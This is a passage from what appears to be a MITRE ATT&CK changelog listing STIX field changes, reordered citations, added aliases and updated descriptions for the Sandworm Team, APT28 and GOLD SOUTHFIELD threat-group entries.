external_references[6]['source_name'] | Telebots | BlackEnergy (Group)
external_references[6]['description'] | (Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[7]['source_name'] | IRON VIKING | Telebots
external_references[7]['description'] | (Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) | (Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[8]['source_name'] | US District Court Indictment GRU Oct 2018 | IRON VIKING
external_references[8]['description'] | Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020. | (Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[9]['source_name'] | Dragos ELECTRUM | US District Court Indictment GRU Oct 2018
external_references[9]['description'] | Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020. | Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[9]['url'] | https://www.dragos.com/resource/electrum/ | https://www.justice.gov/opa/page/file/1098481/download
external_references[10]['source_name'] | F-Secure BlackEnergy 2014 | Dragos ELECTRUM
external_references[10]['description'] | F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016. | Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.
external_references[10]['url'] | https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf | https://www.dragos.com/resource/electrum/
external_references[11]['source_name'] | iSIGHT Sandworm 2014 | F-Secure BlackEnergy 2014
external_references[11]['description'] | Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017. | F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
external_references[11]['url'] | https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html | https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf
external_references[12]['source_name'] | CrowdStrike VOODOO BEAR | iSIGHT Sandworm 2014
external_references[12]['description'] | Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018. | Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.
external_references[12]['url'] | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/ | https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html
external_references[13]['source_name'] | InfoSecurity Sandworm Oct 2014 | CrowdStrike VOODOO BEAR
external_references[13]['description'] | Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017. | Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.
external_references[13]['url'] | https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/ | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/
external_references[14]['source_name'] | NCSC Sandworm Feb 2020 | Microsoft Prestige ransomware October 2022
external_references[14]['description'] | NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020. | MSTIC. (2022, October 14). New “Prestige” ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.
external_references[14]['url'] | https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory | https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/
external_references[15]['source_name'] | USDOJ Sandworm Feb 2020 | InfoSecurity Sandworm Oct 2014
external_references[15]['description'] | Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020. | Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.
external_references[15]['url'] | https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html | https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/
external_references[16]['source_name'] | US District Court Indictment GRU Unit 74455 October 2020 | NCSC Sandworm Feb 2020
external_references[16]['description'] | Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020. | NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.
external_references[16]['url'] | https://www.justice.gov/opa/press-release/file/1328521/download | https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory
external_references[17]['source_name'] | Secureworks IRON VIKING (trailing space) | USDOJ Sandworm Feb 2020
external_references[17]['description'] | Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020. | Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.
external_references[17]['url'] | https://www.secureworks.com/research/threat-profiles/iron-viking | https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html
external_references[18]['source_name'] | UK NCSC Olympic Attacks October 2020 | US District Court Indictment GRU Unit 74455 October 2020
external_references[18]['description'] | UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020. | Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.
external_references[18]['url'] | https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games | https://www.justice.gov/opa/press-release/file/1328521/download
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.2 | 3.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | IRIDIUM
external_references | | {'source_name': 'Secureworks IRON VIKING ', 'description': 'Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.', 'url': 'https://www.secureworks.com/research/threat-profiles/iron-viking'}
external_references | | {'source_name': 'UK NCSC Olympic Attacks October 2020', 'description': 'UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.', 'url': 'https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games'}

Patches

[G0007] APT28

Current version: 4.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
external_referenceshttps://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50
external_referenceshttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/
external_referenceshttps://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/
values_changed
STIX Field | Old value | New value
modified | 2022-03-16 18:08:13.958000+00:00 | 2023-03-26 17:51:20.401000+00:00
external_references[1]['source_name'] | APT28 | SNAKEMACKEREL
external_references[1]['description'] | (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) | (Citation: Accenture SNAKEMACKEREL Nov 2018)
external_references[2]['source_name'] | IRON TWILIGHT | Fancy Bear
external_references[2]['description'] | (Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017) | (Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[3]['source_name'] | SNAKEMACKEREL | Tsar Team
external_references[3]['description'] | (Citation: Accenture SNAKEMACKEREL Nov 2018) | (Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)
external_references[4]['source_name'] | Swallowtail | APT28
external_references[4]['description'] | (Citation: Symantec APT28 Oct 2018) | (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[5]['source_name'] | Group 74 | STRONTIUM
external_references[5]['description'] | (Citation: Talos Seduploader Oct 2017) | (Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[6]['source_name'] | Sednit | IRON TWILIGHT
external_references[6]['description'] | This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018) | (Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
external_references[7]['source_name'] | Sofacy | Threat Group-4127
external_references[7]['description'] | This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017) | (Citation: SecureWorks TG-4127)
external_references[8]['source_name'] | Pawn Storm | TG-4127
external_references[8]['description'] | (Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) | (Citation: SecureWorks TG-4127)
external_references[9]['source_name'] | Fancy Bear | Pawn Storm
external_references[9]['description'] | (Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) | (Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020)
external_references[10]['source_name'] | STRONTIUM | Swallowtail
external_references[10]['description'] | (Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) | (Citation: Symantec APT28 Oct 2018)
external_references[11]['source_name'] | Tsar Team | Group 74
external_references[11]['description'] | (Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017) | (Citation: Talos Seduploader Oct 2017)
external_references[12]['source_name'] | Threat Group-4127 | Accenture SNAKEMACKEREL Nov 2018
external_references[12]['description'] | (Citation: SecureWorks TG-4127) | Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
external_references[13]['source_name'] | TG-4127 | Crowdstrike DNC June 2016
external_references[13]['description'] | (Citation: SecureWorks TG-4127) | Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
external_references[14]['source_name'] | NSA/FBI Drovorub August 2020 | US District Court Indictment GRU Oct 2018
external_references[14]['description'] | NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020. | Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[14]['url'] | https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF | https://www.justice.gov/opa/page/file/1098481/download
external_references[15]['source_name'] | Cybersecurity Advisory GRU Brute Force Campaign July 2021 | GRIZZLY STEPPE JAR
external_references[15]['description'] | NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021. | Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.
external_references[15]['url'] | https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF | https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
external_references[16]['source_name'] | DOJ GRU Indictment Jul 2018 | ESET Zebrocy May 2019
external_references[16]['description'] | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. | ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
external_references[16]['url'] | https://www.justice.gov/file/1080281/download | https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/
external_references[17]['source_name'] | Ars Technica GRU indictment Jul 2018 | ESET Sednit Part 3
external_references[17]['description'] | Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018. | ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
external_references[17]['url'] | https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/ | http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf
external_references[18]['source_name'] | Crowdstrike DNC June 2016 | Sofacy DealersChoice
external_references[18]['description'] | Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016. | Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.
external_references[18]['url'] | https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ | https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/
external_references[19]['source_name'] | FireEye APT28 | FireEye APT28 January 2017
external_references[19]['description'] | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.
external_references[19]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
external_references[20]['source_name'] | SecureWorks TG-4127 | FireEye APT28
external_references[20]['description'] | SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016. | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
external_references[20]['url'] | https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign | https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
external_references[21]['source_name'] | FireEye APT28 January 2017 | Ars Technica GRU indictment Jul 2018
external_references[21]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.
external_references[21]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/
external_references[22]['source_name'] | GRIZZLY STEPPE JAR | TrendMicro Pawn Storm Dec 2020
external_references[22]['description'] | Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017. | Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.
external_references[22]['url'] | https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf | https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html
external_references[23]['source_name'] | Sofacy DealersChoice | Securelist Sofacy Feb 2018
external_references[23]['description'] | Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018. | Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.
external_references[23]['url'] | https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/ | https://securelist.com/a-slice-of-2017-sofacy-activity/83930/
external_references[24]['source_name'] | Palo Alto Sofacy 06-2018 | Kaspersky Sofacy
external_references[24]['description'] | Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018. | Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.
external_references[24]['url'] | https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/ | https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
external_references[25]['source_name'] | Symantec APT28 Oct 2018 | Palo Alto Sofacy 06-2018
external_references[25]['description'] | Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018. | Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
external_references[25]['url'] | https://www.symantec.com/blogs/election-security/apt28-espionage-military-government | https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
external_references[26]['source_name'] | ESET Zebrocy May 2019 | Talos Seduploader Oct 2017
external_references[26]['description'] | ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019. | Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
external_references[26]['url'] | https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/ | https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html
external_references[27]['source_name'] | US District Court Indictment GRU Oct 2018 | Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020
external_references[27]['description'] | Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020. | Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.
external_references[27]['url'] | https://www.justice.gov/opa/page/file/1098481/download | https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/
external_references[28]['source_name'] | Kaspersky Sofacy | Microsoft STRONTIUM Aug 2019
external_references[28]['description'] | Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015. | MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.
external_references[28]['url'] | https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/ | https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/
external_references[29]['source_name'] | ESET Sednit Part 3 | DOJ GRU Indictment Jul 2018
external_references[29]['description'] | ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016. | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.
external_references[29]['url'] | http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf | https://www.justice.gov/file/1080281/download
external_references[30]['source_name'] | Talos Seduploader Oct 2017 | Cybersecurity Advisory GRU Brute Force Campaign July 2021
external_references[30]['description'] | Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018. | NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
external_references[30]['url'] | https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html | https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF
external_references[31]['source_name'] | Securelist Sofacy Feb 2018 | NSA/FBI Drovorub August 2020
external_references[31]['description'] | Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018. | NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
external_references[31]['url'] | https://securelist.com/a-slice-of-2017-sofacy-activity/83930/ | https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF
external_references[32]['source_name'] | Secureworks IRON TWILIGHT Profile | SecureWorks TG-4127
external_references[32]['description'] | Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022. | SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.
external_references[32]['url'] | https://www.secureworks.com/research/threat-profiles/iron-twilight | https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign
external_references[34]['source_name'] | Accenture SNAKEMACKEREL Nov 2018 | Secureworks IRON TWILIGHT Profile
external_references[34]['description'] | Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019. | Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.
external_references[34]['url'] | https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50 | https://www.secureworks.com/research/threat-profiles/iron-twilight
external_references[35]['source_name'] | TrendMicro Pawn Storm Dec 2020 | Symantec APT28 Oct 2018
external_references[35]['description'] | Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021. | Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.
external_references[35]['url'] | https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html | https://www.symantec.com/blogs/election-security/apt28-espionage-military-government
external_references[36]['source_name'] | Microsoft STRONTIUM Aug 2019 | Sednit
external_references[36]['description'] | MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019. | This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)
external_references[37]['source_name'] | Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020 | Sofacy
external_references[37]['description'] | Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020. | This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)

ics-attack

Major Version Changes

[G0115] GOLD SOUTHFIELD

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2019 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)

New Description
[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)
Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
dictionary_item_removed
STIX Field | Old value | New value
external_references | https://www.secureworks.com/research/revil-sodinokibi-ransomware |
values_changed
STIX Field | Old value | New value
modified | 2021-04-26 12:52:34.528000+00:00 | 2023-03-28 20:49:53.223000+00:00
description | [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2019 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD) | [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)
external_references[1]['source_name'] | Secureworks REvil September 2019 | Pinchy Spider
external_references[1]['description'] | Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020. | (Citation: CrowdStrike Evolution of Pinchy Spider July 2021)
external_references[2]['source_name'] | Secureworks GandCrab and REvil September 2019 | Secureworks REvil September 2019
external_references[2]['description'] | Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020. | Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.
external_references[2]['url'] | https://www.secureworks.com/blog/revil-the-gandcrab-connection | https://www.secureworks.com/research/revil-sodinokibi-ransomware
external_references[3]['source_name'] | Secureworks GOLD SOUTHFIELD | CrowdStrike Evolution of Pinchy Spider July 2021
external_references[3]['description'] | Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020. | Meyers, Adam. (2021, July 6). The Evolution of PINCHY SPIDER from GandCrab to REvil. Retrieved March 28, 2023.
external_references[3]['url'] | https://www.secureworks.com/research/threat-profiles/gold-southfield | https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/
x_mitre_version | 1.1 | 2.0
iterable_item_added
STIX Field | Old value | New value
aliases | | Pinchy Spider
external_references | | {'source_name': 'Secureworks GandCrab and REvil September 2019', 'description': 'Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.', 'url': 'https://www.secureworks.com/blog/revil-the-gandcrab-connection'}
external_references | | {'source_name': 'Secureworks GOLD SOUTHFIELD', 'description': 'Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.', 'url': 'https://www.secureworks.com/research/threat-profiles/gold-southfield'}

[G0034] Sandworm Team

Current version: 3.0

Version changed from: 2.2 → 3.0

Details
dictionary_item_removed
STIX Field | Old value | New value
external_references | https://www.justice.gov/opa/page/file/1098481/download |
values_changed
STIX Field | Old value | New value
